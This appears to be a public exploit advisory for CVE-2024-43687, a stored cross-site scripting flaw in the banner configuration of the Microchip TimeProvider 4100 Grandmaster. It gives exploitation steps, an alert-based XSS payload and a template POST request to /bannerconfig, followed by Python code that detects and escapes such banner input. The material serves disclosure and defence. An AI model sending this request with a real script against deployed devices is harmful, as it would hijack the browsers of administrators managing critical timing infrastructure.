
# Exploit Title: Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Armando Huesca Prida
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
# Date of Disclosure: 27/06/2024
# Date of CVE Publication: 4/10/2024
# Exploit Publication: 10/10/2024
# Vendor Homepage: https://www.microchip.com/
# Version: Firmware release 1.0 through 2.4.7
# Tested on: Firmware release 2.3.12
# CVE: CVE-2024-43687
# External References:
# URL: https://www.cve.org/cverecord?id=CVE-2024-43687
# URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html
# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner
# URL: https://www.gruppotim.it/it/footer/red-team.html

# Vulnerability Description:

The TimeProvider 4100 grandmaster firmware has a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor who exploits this vulnerability can execute arbitrary script in the browser of any user who loads the web management interface, regardless of that user's privilege level.

# Exploitation Steps:

1- Log in to the device's web management interface.
2- Open the banner configuration panel.
3- Select the "custom banner" feature.
4- Insert the malicious JavaScript payload.
5- Apply and save the system configuration containing the custom banner.
6- Victims who connect to the device's web management interface will execute the malicious payload in their browser.

# Example of malicious JavaScript payload:

<img src=a onerror=alert(1)>

# Proof of Concept - PoC:

By manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS vulnerability. The list of values that must be updated in the exploit HTTP request is given below:

- [session cookie]
- [malicious JavaScript payload]
- [device IP]

# Exploit - HTTP Request:

POST /bannerconfig HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502
Content-Length: 673
Origin: https://[device IP]
Referer: https://[device IP]/bannerconfig
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive

-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="user_level"

1
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="bannerradio"

CUSTOMIZED
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="txtcustom"

[malicious JavaScript payload]

-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="action"

applybanner
-----------------------------9680247575877256312575038502--
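Added example (not part of this advisory and not the vendor's code) covering the description, the exploitation steps and the PoC request above: it parses the multipart body of the /bannerconfig request, models the unescaped banner rendering next to an HTML-escaped fix, and flags "applybanner" submissions that carry markup. The sample body is constructed from the advisory's field names, boundary and payload; the two render functions are a hypothetical model of the device's page, not its real template.

```python
import html
import re

# Constructed sample body mirroring the advisory's /bannerconfig request:
# field names and boundary are taken from the advisory, the payload is its example.
BOUNDARY = "---------------------------9680247575877256312575038502"
SAMPLE_BODY = (
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="user_level"\r\n\r\n1\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="bannerradio"\r\n\r\nCUSTOMIZED\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="txtcustom"\r\n\r\n'
    "<img src=a onerror=alert(1)>\r\n"
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="action"\r\n\r\napplybanner\r\n'
    f"--{BOUNDARY}--\r\n"
)

def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser: returns {field name: value} (text parts only)."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":          # leading empty chunk / closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        m = re.search(r'name="([^"]+)"', headers)
        if m:
            fields[m.group(1)] = value
    return fields

def render_banner_vulnerable(banner: str) -> str:
    """Hypothetical model of the flaw: the stored banner is interpolated unescaped."""
    return f'<div id="banner">{banner}</div>'

def render_banner_fixed(banner: str) -> str:
    """Hardened rendering: escape the value so markup is displayed as text, not executed."""
    return f'<div id="banner">{html.escape(banner, quote=True)}</div>'

# Heuristic for the detection helper: a tag opener, an on*= handler or a javascript:
# URL has no place in a legitimate login banner string.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)

def flag_banner_submission(fields: dict) -> bool:
    """Detection: True when an 'applybanner' request stores markup in txtcustom."""
    return (fields.get("action") == "applybanner"
            and fields.get("bannerradio") == "CUSTOMIZED"
            and MARKUP_RE.search(fields.get("txtcustom", "")) is not None)

if __name__ == "__main__":
    parsed = parse_multipart(SAMPLE_BODY, BOUNDARY)
    print("flagged:   ", flag_banner_submission(parsed))
    print("vulnerable:", render_banner_vulnerable(parsed["txtcustom"]))
    print("fixed:     ", render_banner_fixed(parsed["txtcustom"]))
```

The same parse-and-flag logic can be run over captured POST bodies to /bannerconfig from a proxy or web server log to spot banner changes that should be reviewed.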

# End